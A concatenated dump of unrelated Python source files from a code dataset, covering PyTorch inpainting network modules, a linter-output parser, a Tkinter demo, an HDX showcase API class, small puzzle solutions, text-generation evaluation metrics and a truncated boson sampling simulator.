// 2\n\n self.g = nn.Conv2d(in_channels=self.input_nc, out_channels=self.inter_nc, kernel_size=1, stride=1, padding=0) \n\n if bn_layer: \n self.W = nn.Sequential(\n nn.Conv2d(in_channels=self.inter_nc, out_channels=self.input_nc, kernel_size=1, stride=1, padding=0), \n nn.BatchNorm2d(self.input_nc) \n )\n self.W[0].weight.data.zero_()\n self.W[0].bias.data.zero_() \n else:\n self.W = nn.Conv2d(in_channels=self.inter_nc, out_channels=self.input_nc, kernel_size=1, stride=1, padding=0) \n self.W.weight.data.zero_()\n self.W.bias.data.zero_() \n\n self.theta = nn.Conv2d(in_channels=self.input_nc, out_channels=self.inter_nc, kernel_size=1, stride=1, padding=0)\n self.phi = nn.Conv2d(in_channels=self.input_nc, out_channels=self.inter_nc, kernel_size=1, stride=1, padding=0) \n\n if sub_sample:\n self.g = nn.Sequential(self.g, nn.MaxPool2d(kernel_size(2, 2)))\n self.phi = nn.Sequential(self.phi, nn.MaxPool2d(kernel_size(2, 2))) \n\n def forward(self, x): \n batch_size = x.size(0) \n\n g_x = self.g(x).view(batch_size, self.inter_nc, -1) \n g_x = g_x.permute(0, 2, 1) \n\n theta_x = self.theta(x).view(batch_size, self.inter_nc, -1) \n theta_x = theta_x.permute(0, 2, 1) \n\n phi_x = self.phi(x).view(batch_size, self.inter_nc, -1) \n\n f = torch.matmul(theta_x, phi_x) \n f_div_C = F.softmax(f, dim=-1) \n\n y = torch.matmul(f_div_C, g_x) \n y = y.permute(0, 2, 1).contiguous() \n y = y.view(batch_size, self.inter_nc, *x.size()[2:]) \n W_y = self.W(y) \n\n z = W_y + x\n return z \n\n### ConvBlock\nclass ConvBlock(nn.Module):\n def __init__(self, input_nc, output_nc, kernel_size, stride=1, padding=0, dilation=1, groups=1, bias=True, pad_type='zero', norm=None, acti='lrelu'):\n super(ConvBlock, self).__init__() \n self.use_bias = bias \n\n # initialize padding \n if pad_type == 'reflect':\n self.pad = nn.ReflectionPad2d(padding)\n elif pad_type == 'zero':\n self.pad = nn.ZeroPad2d(padding) \n elif pad_type == 'replicate': \n self.pad = nn.ReplicationPad2d(padding)\n else:\n assert 0, \"Unsupported padding type: {}\".format(pad_type) \n\n # initialize normalization\n if norm == 'batch':\n self.norm = nn.BatchNorm2d(output_nc) \n elif norm == 'instance':\n self.norm = nn.InstanceNorm2d(output_nc) \n elif norm is None or norm == 'spectral': \n self.norm = None \n else: \n assert 0, \"Unsupported normalization: {}\".format(norm) \n\n # initialize activation\n if acti == 'relu':\n self.acti = nn.ReLU(inplace=True) \n elif acti == 'lrelu':\n self.acti = nn.LeakyReLU(0.2, inplace=True) \n elif acti == 'prelu':\n self.acti = nn.PReLU() \n elif acti == 'elu':\n self.acti = nn.ELU() \n elif acti == 'tanh':\n self.acti = nn.Tanh() \n elif acti == 'sigmoid':\n self.acti = nn.Sigmoid() \n elif acti is None:\n self.acti = None \n else: \n assert 0, \"Unsupported activation: {}\".format(acti) \n\n # initialize convolution \n if norm == 'spectral': \n self.conv = SpectralNorm(nn.Conv2d(input_nc, output_nc, kernel_size, stride, dilation=dilation, groups=groups, bias=self.use_bias))\n else:\n self.conv = nn.Conv2d(input_nc, output_nc, kernel_size, stride, dilation=dilation, groups=groups, bias=self.use_bias) \n\n def forward(self, x):\n x = self.conv(self.pad(x)) \n if self.norm:\n x = self.norm(x)\n if self.acti:\n x = self.acti(x)\n return x \n\ndef l2normalize(v, eps=1e-12):\n return v / (v.norm() + eps) \n\n### SpectralNorm \nclass SpectralNorm(nn.Module):\n \"\"\"\n Spectral Normalization for Generative Adversarial Networks\n Pytorch implementation https://github.com/christiancosgrove/pytorch-spectral-normalization-gan \n \"\"\"\n def __init__(self, module, name='weight', power_iterations=1):\n super(SpectralNorm, self).__init__() \n self.module = module \n self.name = name \n self.power_iterations = power_iterations \n if not self._made_params():\n self._make_params() \n \n def _update_u_v(self):\n u = getattr(self.module, self.name + \"_u\") \n v = getattr(self.module, self.name + \"_v\") \n w = getattr(self.module, self.name + \"_bar\") \n\n height = w.data.shape[0] \n for _ in range(self.power_iterations): \n v.data = l2normalize(torch.mv(torch.t(w.view(height,-1).data), u.data)) \n u.data = l2normalize(torch.mv(w.view(height,-1).data, v.data)) \n\n sigma = u.dot(w.view(height, -1).mv(v)) \n setattr(self.module, self.name, w / sigma.expand_as(w)) \n\n def _made_params(self):\n try: \n u = getattr(self.module, self.name + \"_u\") \n v = getattr(self.module, self.name + \"_v\") \n w = getattr(self.module, self.name + \"_bar\") \n return True \n except AttributeError:\n return False \n\n def _make_params(self): \n w = getattr(self.module, self.name) \n\n height = w.data.shape[0] \n width = w.view(height, -1).data.shape[1] \n\n u = nn.Parameter(w.data.new(height).normal_(0, 1), requires_grad=False) \n v = nn.Parameter(w.data.new(width).normal_(0, 1), requires_grad=False) \n u.data = l2normalize(u.data) \n v.data = l2normalize(v.data) \n w_bar = nn.Parameter(w.data) \n\n del self.module._parameters[self.name] \n\n self.module.register_parameter(self.name + \"_u\", u) \n self.module.register_parameter(self.name + \"_v\", v) \n self.module.register_parameter(self.name + \"_bar\", w_bar) \n\n def forward(self, *args):\n self._update_u_v() \n return self.module.forward(*args) \n\n","sub_path":"2020ECCV-DeepGIN Deep Generative Inpainting Network for Extreme Image Inpainting/Task1-Pytorch/models/networks.py","file_name":"networks.py","file_ext":"py","file_size_in_byte":35618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"198282213","text":"import sys\nimport os.path\nimport system\nimport dirutils\nimport tempfile\nfrom itertools import takewhile\n\ntemp_path = os.path.abspath(sys.argv[1])\ndirectory = os.path.abspath(sys.argv[2])\ncsv = os.path.abspath(sys.argv[3])\nexe = sys.argv[4]\nif (len(sys.argv) > 5):\n opts = sys.argv[5]\nelse:\n opts = \"\"\n\nprint(\"======Running cpplint=======\")\nprint(\"Working dir:\", directory)\nprint(\"CSV file:\", csv)\nprint(\"Excutable:\", exe)\nprint(\"Executable options:\", opts)\n\nc_files = dirutils.list_files(directory, '.c') + dirutils.list_files(directory, '.cpp')\n(output, err, exit, time) = system.system_call(exe + \" \" + \" \".join(c_files) + \" \" + opts, directory)\n\ntemp_file = open(temp_path, 'w')\ntemp_file.write(output.decode(\"utf-8\"))\ntemp_file.close()\n\nsys.stdout = open(csv, \"w\")\nprint(\"File, Line, Error\")\nwith open(temp_path) as f:\n for line in f.readlines():\n a = line.strip().split(\":\")\n if (len(a) >= 4) and (a[0] == 'uno'):\n if len(a[2]) > 10: # hack to work around bug in printint wrong array indexing\n print(os.path.basename(a[1]), \",\", ''.join(takewhile(str.isdigit, a[2].strip())), \",\", a[2])\n else:\n print(os.path.basename(a[1]), \",\", a[2], \",\", a[3])\n\nsys.stdout = sys.__stdout__ \nprint(\"======Done with uno=======\")\n","sub_path":"python/uno.py","file_name":"uno.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"139314908","text":"from tkinter import *\nfrom tkinter import messagebox\n\nmyGui = Tk()\n\ndef hello():\n b = a.get()\n myLabel3 = Label(text = b, fg = 'red', bg = 'yellow', font = 10)\n myLabel3.pack()\n\ndef dele():\n myLabel1 = Label(text = 'deleted', fg = 'red', bg = 'yellow', font = 10)\n myLabel1.pack()\n\ndef newfi():\n myLabel1 = Label(text = 'clicked on new file', fg = 'red', bg = 'yellow', font = ('roman', 24, 'italic'))\n myLabel1.pack()\n\ndef mbox():\n messagebox.showinfo(title='Save', message = 'are you sure to save?')\n\ndef mquit():\n mess = messagebox.askyesno(title = 'Quit', message = 'Are you sure to quit?')\n if mess == 1:\n myGui.destroy()\n\n\na = StringVar()\nmyGui.title('Hello')\nmyGui.geometry('500x500+100+100')\n\nmyLabel1 = Label(text = 'label one', fg = 'red', bg = 'yellow', font = ('arial', 24, 'italic')).pack()\nmyButton1 = Button(text = 'Enter', fg = '#2f363d', bg = '#9EC129', command = hello, font = ('times', 24, 'bold')).pack()\nmyButton2 = Button(text = 'Delete', fg = '#0D0000', bg = '#8B0000', command = dele, font = 20).pack()\ntext = Entry(textvariable = a).pack()\n\nmymenu = Menu()\nlistone = Menu()\nlisttwo = Menu()\n\nlistone.add_command(label = 'New File', command = newfi)\nlistone.add_command(label = 'Open File')\nlistone.add_command(label = 'Save File', command = mbox)\nlistone.add_command(label = 'Quit', command = mquit)\n\nlisttwo.add_command(label = 'undo')\nlisttwo.add_command(label = 'redo')\n\nmymenu.add_cascade(label = 'File', menu = listone)\nmymenu.add_cascade(label = 'Edit', menu = listtwo)\nmymenu.add_cascade(label = 'Format')\nmymenu.add_cascade(label = 'Run')\n\nmyGui.config(menu = mymenu)\n\n\n\nmyGui.mainloop()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"240584322","text":"# rename joints of adun\n#\n# shoulder2 -> shoulder_r\n# elbow -> elbow_r\n# radioulnar -> radioulnar_r\n# shoulder2_l -> shoulder_l\n\nimport cPickle\n\nimport sys\nif '../../../PyCommon/modules' not in sys.path:\n sys.path.append('../../../PyCommon/modules')\nimport Resource.ysMotionLoader as yml\nimport Resource.dcVRMLLoader as dvl\nimport numpy.core.multiarray\n\ndef buildJointMap():\n jointMap = {}\n jointMap[\"shoulder2\"] = \"shoulder_r\"\n jointMap[\"elbow\"] = \"elbow_r\"\n jointMap[\"radioulnar\"] = \"radioulnar_r\"\n jointMap[\"shoulder2_l\"] = \"shoulder_l\"\n return jointMap\n\ndef renameBvhJoint(bvh):\n jointMap = buildJointMap()\n for joint in bvh.joints:\n for k in jointMap.keys():\n if joint.name == k:\n joint.name = jointMap[k]\n \n return bvh\n\ndef renameWrlJoint(wrl):\n jointMap = buildJointMap()\n for joint in wrl.joints:\n for k in jointMap.keys():\n if joint.name == k:\n joint.name = jointMap[k]\n\n return wrl\n\ndef renameMuscleJoint(msclDict):\n # rename joint names of path points of muscles\n jointMap = buildJointMap()\n \n for mscl in msclDict.values():\n pathPointSet = mscl[\"GeometryPath\"][\"PathPointSet\"]\n for pathPoint in pathPointSet.values():\n for k in jointMap.keys():\n if pathPoint[\"joint\"] == k:\n pathPoint[\"joint\"] = jointMap[k]\n\n return msclDict\n\nif __name__=='__main__':\n\n bvhFilePath = './ad.bvh'\n msclFilePath = './mscl'\n\n bvh = yml.readBvhFileAsBvh(bvhFilePath)\n bvh = renameBvhJoint(bvh)\n bvh.writeBvhFile(bvhFilePath)\n \n msclFile = open(msclFilePath, 'rb')\n msclDict = cPickle.load(msclFile)\n msclFile.close()\n msclDict = renameMuscleJoint(msclDict)\n msclFile = open(msclFilePath, 'wb')\n cPickle.dump(msclDict, msclFile)\n msclFile.close()\n","sub_path":"Tracking/Model/ad/renameJoint.py","file_name":"renameJoint.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"543254070","text":"import sys\n\nDAYS=int(sys.argv[2])\nSTART_VALUE = 6\n\ndata = [0] * 9\nfor i in open(sys.argv[1], 'r').read().split(','):\n data[int(i)] += 1\n\nfor _ in range(1, DAYS):\n spawn_count=data[0]\n data=data[1:]\n data[START_VALUE] += spawn_count\n data.append(spawn_count)\nprint(sum(data))\n","sub_path":"2021/06/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"373531967","text":"'''\np\np y\np y t\np y t h\np y t h o\np y t h o n\n'''\nstring = input(\"Enter a string ....\")\n\nlength = len(string)\n\nfor row in range(length):\n for col in range(row+1):\n print(string[col],end=' ')\n print()\n","sub_path":"numaric and star/parttern_8.py","file_name":"parttern_8.py","file_ext":"py","file_size_in_byte":213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"301368914","text":"# -*- coding: utf-8 -*-\n\"\"\"Showcase class containing all logic for creating, checking, and updating showcases.\"\"\"\nimport logging\nfrom os.path import join\nfrom typing import List, Union, Optional, Dict\n\nimport hdx.data.dataset\nimport hdx.data.hdxobject\nfrom hdx.hdx_configuration import Configuration\nfrom hdx.utilities import is_valid_uuid\n\nlogger = logging.getLogger(__name__)\n\n\nclass Showcase(hdx.data.hdxobject.HDXObject):\n \"\"\"Showcase class containing all logic for creating, checking, and updating showcases.\n\n Args:\n initial_data (Optional[Dict]): Initial showcase metadata dictionary. Defaults to None.\n configuration (Optional[Configuration]): HDX configuration. Defaults to global configuration.\n \"\"\"\n dataset_ids_field = 'dataset_ids'\n\n def __init__(self, initial_data=None, configuration=None):\n # type: (Optional[Dict], Optional[Configuration]) -> None\n if not initial_data:\n initial_data = dict()\n super(Showcase, self).__init__(initial_data, configuration=configuration)\n\n @staticmethod\n def actions():\n # type: () -> Dict[str, str]\n \"\"\"Dictionary of actions that can be performed on object\n\n Returns:\n Dict[str, str]: Dictionary of actions that can be performed on object\n \"\"\"\n return {\n 'show': 'ckanext_showcase_show',\n 'update': 'ckanext_showcase_update',\n 'create': 'ckanext_showcase_create',\n 'delete': 'ckanext_showcase_delete',\n 'list': 'ckanext_showcase_list',\n 'associate': 'ckanext_showcase_package_association_create',\n 'disassociate': 'ckanext_showcase_package_association_delete',\n 'list_datasets': 'ckanext_showcase_package_list',\n 'list_showcases': 'ckanext_package_showcase_list'\n }\n\n def update_from_yaml(self, path=join('config', 'hdx_showcase_static.yml')):\n # type: (str) -> None\n \"\"\"Update showcase metadata with static metadata from YAML file\n\n Args:\n path (Optional[str]): Path to YAML dataset metadata. Defaults to config/hdx_showcase_static.yml.\n\n Returns:\n None\n \"\"\"\n super(Showcase, self).update_from_yaml(path)\n\n def update_from_json(self, path=join('config', 'hdx_showcase_static.json')):\n # type: (str) -> None\n \"\"\"Update showcase metadata with static metadata from JSON file\n\n Args:\n path (Optional[str]): Path to JSON dataset metadata. Defaults to config/hdx_showcase_static.json.\n\n Returns:\n None\n \"\"\"\n super(Showcase, self).update_from_json(path)\n\n @staticmethod\n def read_from_hdx(identifier, configuration=None):\n # type: (str, Optional[Configuration]) -> Optional['Showcase']\n \"\"\"Reads the showcase given by identifier from HDX and returns Showcase object\n\n Args:\n identifier (str): Identifier of showcase\n configuration (Optional[Configuration]): HDX configuration. Defaults to global configuration.\n\n Returns:\n Optional[Showcase]: Showcase object if successful read, None if not\n \"\"\"\n\n showcase = Showcase(configuration=configuration)\n result = showcase._load_from_hdx('showcase', identifier)\n if result:\n return showcase\n return None\n\n def check_required_fields(self, ignore_fields=list()):\n # type: (List[str]) -> None\n \"\"\"Check that metadata for showcase is complete. The parameter ignore_fields should\n be set if required to any fields that should be ignored for the particular operation.\n\n Args:\n ignore_fields (List[str]): Fields to ignore. Default is [].\n\n Returns:\n None\n \"\"\"\n self._check_required_fields('showcase', ignore_fields)\n\n def update_in_hdx(self):\n # type: () -> None\n \"\"\"Check if showcase exists in HDX and if so, update it\n\n Returns:\n None\n \"\"\"\n self._update_in_hdx('showcase', 'name')\n\n def create_in_hdx(self):\n # type: () -> None\n \"\"\"Check if showcase exists in HDX and if so, update it, otherwise create it\n\n Returns:\n None\n \"\"\"\n self._create_in_hdx('showcase', 'name', 'title')\n\n def delete_from_hdx(self):\n # type: () -> None\n \"\"\"Deletes a showcase from HDX.\n\n Returns:\n None\n \"\"\"\n self._delete_from_hdx('showcase', 'id')\n\n def get_tags(self):\n # type: () -> List[str]\n \"\"\"Return the dataset's list of tags\n\n Returns:\n List[str]: List of tags or [] if there are none\n \"\"\"\n return self._get_tags()\n\n def add_tag(self, tag):\n # type: (str) -> bool\n \"\"\"Add a tag\n\n Args:\n tag (str): Tag to add\n\n Returns:\n bool: True if tag added or False if tag already present\n \"\"\"\n return self._add_tag(tag)\n\n def add_tags(self, tags):\n # type: (List[str]) -> bool\n \"\"\"Add a list of tag\n\n Args:\n tags (List[str]): List of tags to add\n\n Returns:\n bool: Returns True if all tags added or False if any already present.\n \"\"\"\n return self._add_tags(tags)\n\n def remove_tag(self, tag):\n # type: (str) -> bool\n \"\"\"Remove a tag\n\n Args:\n tag (str): Tag to remove\n\n Returns:\n bool: True if tag removed or False if not\n \"\"\"\n return self._remove_hdxobject(self.data.get('tags'), tag, matchon='name')\n\n def get_datasets(self):\n # type: () -> List[hdx.data.dataset.Dataset]\n \"\"\"Get any datasets in the showcase\n\n Returns:\n List[Dataset]: List of datasets\n \"\"\"\n assoc_result, datasets_dicts = self._read_from_hdx('showcase', self.data['id'], fieldname='showcase_id',\n action=self.actions()['list_datasets'])\n datasets = list()\n if assoc_result:\n for dataset_dict in datasets_dicts:\n dataset = hdx.data.dataset.Dataset(dataset_dict, configuration=self.configuration)\n datasets.append(dataset)\n return datasets\n\n def _get_showcase_dataset_dict(self, dataset):\n # type: (Union[hdx.data.dataset.Dataset,Dict,str]) -> Dict\n \"\"\"Get showcase dataset dict\n\n Args:\n showcase (Union[Showcase,Dict,str]): Either a showcase id or Showcase metadata from a Showcase object or dictionary\n\n Returns:\n Dict: showcase dataset dict\n \"\"\"\n if isinstance(dataset, hdx.data.dataset.Dataset) or isinstance(dataset, dict):\n if 'id' not in dataset:\n dataset = hdx.data.dataset.Dataset.read_from_hdx(dataset['name'])\n dataset = dataset['id']\n elif not isinstance(dataset, str):\n raise hdx.data.hdxobject.HDXError('Type %s cannot be added as a dataset!' % type(dataset).__name__)\n if is_valid_uuid(dataset) is False:\n raise hdx.data.hdxobject.HDXError('Dataset %s does not look like a dataset id!' % dataset)\n return {'showcase_id': self.data['id'], 'package_id': dataset}\n\n def add_dataset(self, dataset, datasets_to_check=None):\n # type: (Union[hdx.data.dataset.Dataset,Dict,str], List[hdx.data.dataset.Dataset]) -> bool\n \"\"\"Add a dataset\n\n Args:\n dataset (Union[Dataset,Dict,str]): Either a dataset id or dataset metadata either from a Dataset object or a dictionary\n datasets_to_check (List[Dataset]): List of datasets against which to check existence of dataset. Defaults to datasets in showcase.\n\n Returns:\n bool: True if the dataset was added, False if already present\n \"\"\"\n showcase_dataset = self._get_showcase_dataset_dict(dataset)\n if datasets_to_check is None:\n datasets_to_check = self.get_datasets()\n for dataset in datasets_to_check:\n if showcase_dataset['package_id'] == dataset['id']:\n return False\n self._write_to_hdx('associate', showcase_dataset, 'package_id')\n return True\n\n def add_datasets(self, datasets, datasets_to_check=None):\n # type: (List[Union[hdx.data.dataset.Dataset,Dict,str]], List[hdx.data.dataset.Dataset]) -> bool\n \"\"\"Add multiple datasets\n\n Args:\n datasets (List[Union[Dataset,Dict,str]]): A list of either dataset ids or dataset metadata from Dataset objects or dictionaries\n datasets_to_check (List[Dataset]): List of datasets against which to check existence of dataset. Defaults to datasets in showcase.\n\n Returns:\n bool: Returns True if all datasets added or False if any already present\n \"\"\"\n if datasets_to_check is None:\n datasets_to_check = self.get_datasets()\n alldatasetsadded = True\n for dataset in datasets:\n if not self.add_dataset(dataset, datasets_to_check=datasets_to_check):\n alldatasetsadded = False\n return alldatasetsadded\n\n def remove_dataset(self, dataset):\n # type: (Union[Dataset,Dict,str]) -> None\n \"\"\"Remove a dataset\n\n Args:\n dataset (Union[Dataset,Dict,str]): Either a dataset id or dataset metadata either from a Dataset object or a dictionary\n\n Returns:\n None\n \"\"\"\n self._write_to_hdx('disassociate', self._get_showcase_dataset_dict(dataset), 'package_id')\n","sub_path":"src/hdx/data/showcase.py","file_name":"showcase.py","file_ext":"py","file_size_in_byte":9546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"92226467","text":"# Learn Python the hard way\n# ex17.py lpthw\n\nfrom sys import argv\nfrom os.path import exists\n\n#script name test.txt test2.txt the arguments that I gave\nscript, from_file, to_file = argv\n\n#name of the file1(test.txt) and name of the file2(test2.txt)\nprint (\"Copying from %s to %s\" % (from_file, to_file))\n\n# we could do these two on one line too, how?\n#we use in file to open the from_file(the file we want to copy)\n#in_file = open(from_file)\n#indata = in_file.read()\nindata = open(from_file).read()\n\n\n#prints the file size\nprint (\"The input file is %d bytes long\" % len(indata))\n\n#True if the file alread exists False if it doesn't\nprint (\"Does the output file exist? %r\" % exists(to_file))\nprint (\"Ready, hit RETURN to continue, CTRL-C to abort.\")\nraw_input()\n\n#we use out_file to open the to_file(the file we want to copy)\nout_file = open(to_file, 'w')\nout_file.write(indata)\n\nprint (\"Alright, all done.\")\n\nout_file.close()\n#in_file.close()\n","sub_path":"ex17.py","file_name":"ex17.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"518362154","text":"n = int(input())\r\n\r\narr = [ list(map(int,input())) for _ in range(n)]\r\n\r\ndef dfs(x,y,n):\r\n\r\n if n == 1:\r\n print(arr[x][y],end='')\r\n return\r\n \r\n if n>=2:\r\n s = 0\r\n #가지치기 \r\n for i in range(x, x+n):\r\n for j in range(y, y+n):\r\n s+=arr[i][j]\r\n if s == 0:\r\n print('0',end='')\r\n elif s == 1*(n**2):\r\n print('1',end='')\r\n else:\r\n print('(',end='')\r\n n = n // 2\r\n dfs(x,y,n)\r\n dfs(x,y+n,n)\r\n dfs(x+n,y,n)\r\n dfs(x+n,y+n,n)\r\n print(')',end='')\r\n\r\ndfs(0,0,n)","sub_path":"백준/Silver/1992. 쿼드트리/쿼드트리.py","file_name":"쿼드트리.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"282670525","text":"# 1252 - SORT USING MOD (C/C++ LIKE) AND KEY FUNCTION WITH TERNARY AND BITWISE OPERATORS\r\ndef main():\r\n from sys import stdin\r\n\r\n keynum = lambda num: (abs(num) % M * (1 if num >= 0 else -1),\r\n -1 * (num & 1), num * (-1 if num & 1 else 1))\r\n\r\n while True:\r\n entry = input()\r\n print(entry)\r\n if entry == '0 0':\r\n break\r\n\r\n N, M = [int(x) for x in entry.split()]\r\n nums = [int(stdin.readline()) for _ in range(N)]\r\n nums.sort(key=keynum)\r\n print('\\n'.join(map(str, nums)))\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"problems/python/1252.py","file_name":"1252.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"411895633","text":"import pandas as pd\n\n#MERGE THE COLUMNS FROM THE TWO DATASETS WITH EARLIEST AND 6 MO TAGS\npd.set_option('display.max_rows', 100)\n\ndf1 = pd.read_csv(\"step4_result_earliest_tags.csv\")\ndf2 = pd.read_csv(\"step3_tags_after_6_mo.csv\")\n\n# CHANGE THE NAMES OF THE COLUMNS IN THE 6 MONTH DF STARTING AFTER WITH 14\n\n\nfor colnum in range(13,len(df2.columns)): #because 0 indexed to start at 14th column use 13\n \n orig_col_name = df2.columns[colnum]\n new_col_name = f\"t6_{orig_col_name}\"\n df2.rename(columns = {orig_col_name : new_col_name}, inplace = True)\n\nprint(len(df1.columns))\nprint(len(df2.columns))\n\nmgd_df = pd.merge(df1, df2, on=\"app_id\")\n\nprint(len(mgd_df.columns))\n\nmgd_df.drop(mgd_df.filter(regex='_y').columns, axis=1, inplace=True)\n# mgd_df = mgd_df.loc[:,~mgd_df.columns.str.endswith('_y')]\n\nprint(len(mgd_df.columns))\n\n## SOME TAGS ARE MISSPELT OR DONT EXIST ANYMORE SO REMOVE THEM ### YOU DON\"T NEED TO DO THIS ANYMORE B/C YOU DID IT IN STEP 2\n#mgd_df = mgd_df.drop('tag_999999', 1)\n#mgd_df = mgd_df.drop('t6_tag_999999', 1)\n#mgd_df = mgd_df.drop('tag_5144', 1)\n#mgd_df = mgd_df.drop('t6_tag_5144', 1)\n#mgd_df = mgd_df.drop('tag_1694', 1)\n#mgd_df = mgd_df.drop('t6_tag_1694', 1)\n#mgd_df = mgd_df.drop('tag_134316', 1)\n#mgd_df = mgd_df.drop('t6_tag_134316', 1)\n\n# mgd_df.drop(mgd_df.filter(regex='999999').columns, axis=1, inplace=True)\n# mgd_df.drop(mgd_df.filter(regex='5144').columns, axis=1, inplace=True)\n# mgd_df.drop(mgd_df.filter(regex='1694').columns, axis=1, inplace=True)\n# mgd_df.drop(mgd_df.filter(regex='134316').columns, axis=1, inplace=True)\n\nmgd_df.to_csv(\"step5_result.csv\", index=False)","sub_path":"step5_merge_t1_t2_tags.py","file_name":"step5_merge_t1_t2_tags.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"586419771","text":"import os\nimport sys\nimport StringIO\nimport smtplib\n\nold_stdout = sys.stdout # Memorize the default stdout stream\nbuffer = StringIO.StringIO()\n\ndef email_recipient(message):\n if not message:\n message = \"This message was empty\"\n \n # creates SMTP session \n s = smtplib.SMTP('smtp.gmail.com', 587) \n \n # start TLS for security \n s.starttls() \n \n # Authentication \n s.login(\"****\", \"****\") \n \n # sending the mail \n s.sendmail(\"experiment_results@lupalab.com\", \"sakbar@ncsu.edu\", message) \n \n # terminating the session \n s.quit() \n\ndef add_buffer_to_io():\n sys.stdout = buffer\n\ndef remove_buffer_from_io():\n sys.stdout = old_stdout\n buffer.close()\n\ndef update_user_by_email():\n experiment_data = buffer.getvalue() # Return a str containing the entire contents of the buffer.\n print(experiment_data) # Why not print it?\n email_recipient(experiment_data)\n\ndef run_experiment(exper):\n add_buffer_to_io()\n try:\n exper()\n except Exception as e:\n print(e)\n update_user_by_email()\n remove_buffer_from_io()","sub_path":"tan/update_user.py","file_name":"update_user.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"341683550","text":"import numpy as np\nimport matplotlib.pyplot as plt \n\nS = 1\nI1 = 5\nc = 3e8\nv0 = 3.0/656 * 10**17\nvd = np.sqrt(2 * 1.38 * 10**-23 * 10000/(1.7 * 10**-27) ) * v0 / c \nv = np.linspace(-5 * vd + v0, v0 + 5 * vd, num = 200)\nDp = 1/(np.sqrt(3.14)*vd) * np.exp(-((v - v0)/vd)**2)\nx = (v -v0) * 10**-14\n\nT = 10**10 * Dp\nu= np.arange(0, 1.2, 0.2)\nI = np.linspace(0, 0, 6)\n\ndef limb(u):\n I = S + np.exp(-T/u)*(I1-S)\n return I\n\n#for i in range(len(u)):\n # if i == 0:\n # I[0] = S\n # else:\n # y = limb(u[i])\n # I[i] = min(y)\n\n#print (u)\n#print (I)\n\n#plt.plot(u,I, '-g', label = \"Jedan mnogo kul grafik\")\n\nplt.plot(x, limb(1), '-b' )\nplt.plot(x, limb(0.5) , '-g')\nplt.show()\n","sub_path":"2015/AST1/vezbovni/Bozidar/limb.py","file_name":"limb.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"481416668","text":"\nimport os\nimport scipy\nimport pandas as pd\nfrom sentence_transformers import SentenceTransformer\nfrom sklearn.metrics import accuracy_score, precision_score, recall_score, f1_score\nfrom sklearn.metrics import classification_report\nfrom rouge import Rouge\nfrom statistics import mean\nimport nltk\nnltk.download('punkt')\nfrom nltk.translate.bleu_score import sentence_bleu, corpus_bleu\nfrom tqdm.notebook import tqdm\n\ncosine_model = SentenceTransformer('bert-base-nli-mean-tokens')\nrouge = Rouge()\n\n\n## Cosine Similarity\ndef cosine_similarity(actual_headlines, predicted_headlines):\n similarity = 0\n for i, (actual_headline, predicted_headline) in enumerate(zip(actual_headlines, predicted_headlines)):\n actual_headline_embeddings = cosine_model.encode(actual_headline)\n predicted_headline_embeddings = cosine_model.encode(predicted_headline)\n similarity += 1 - scipy.spatial.distance.cdist([actual_headline_embeddings], [predicted_headline_embeddings], \"cosine\")[0]\n return similarity/(i+1)\n\n## Rouge-l Score\ndef rouge_score(actual_headlines, predicted_headlines):\n score = {'f':0, 'p':0, 'r':0}\n for i, (actual_headline, predicted_headline) in enumerate(zip(actual_headlines, predicted_headlines)):\n rouge_score = rouge.get_scores(actual_headline, predicted_headline)\n rouge_scores = rouge_score[0]['rouge-l']\n for key in list('fpr'):\n score[key]+=rouge_scores[key]\n for key in list('fpr'):\n score[key]/=(i+1)\n return score\n\n## BLEU Score\ndef bleu_score(actual_headlines, predicted_headlines):\n bleu_score = 0\n for i, (actual_headline, predicted_headline) in enumerate(zip(actual_headlines, predicted_headlines)):\n hypothesis = predicted_headline.split()\n reference = actual_headline.split() \n references = [reference] # list of references for 1 sentence.\n list_of_references = [references] # list of references for all sentences in corpus.\n list_of_hypotheses = [hypothesis] # list of hypotheses that corresponds to list of references.\n bleu_score += corpus_bleu(list_of_references, list_of_hypotheses)\n return bleu_score/(i+1)","sub_path":"src/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"214725881","text":"__author__ = 'Tomasz Rybotycki'\n\nfrom typing import List\n\nfrom numpy import arange, ndarray\nfrom numpy.random import choice\nfrom scipy import special\n\nfrom src.BosonSamplingSimulator import BosonSamplingSimulator\nfrom src.simulation_strategies.FixedLossSimulationStrategy import FixedLossSimulationStrategy\nfrom src.simulation_strategies.SimulationStrategy import SimulationStrategy\n\n\nclass UniformLossSimulationStrategy(SimulationStrategy):\n def __init__(self, interferometer_matrix: ndarray, number_of_modes: int, probability_of_uniform_loss: float) \\\n -> None:\n self.interferometer_matrix = interferometer_matrix\n self.number_of_modes = number_of_modes\n self.probability_of_uniform_loss = 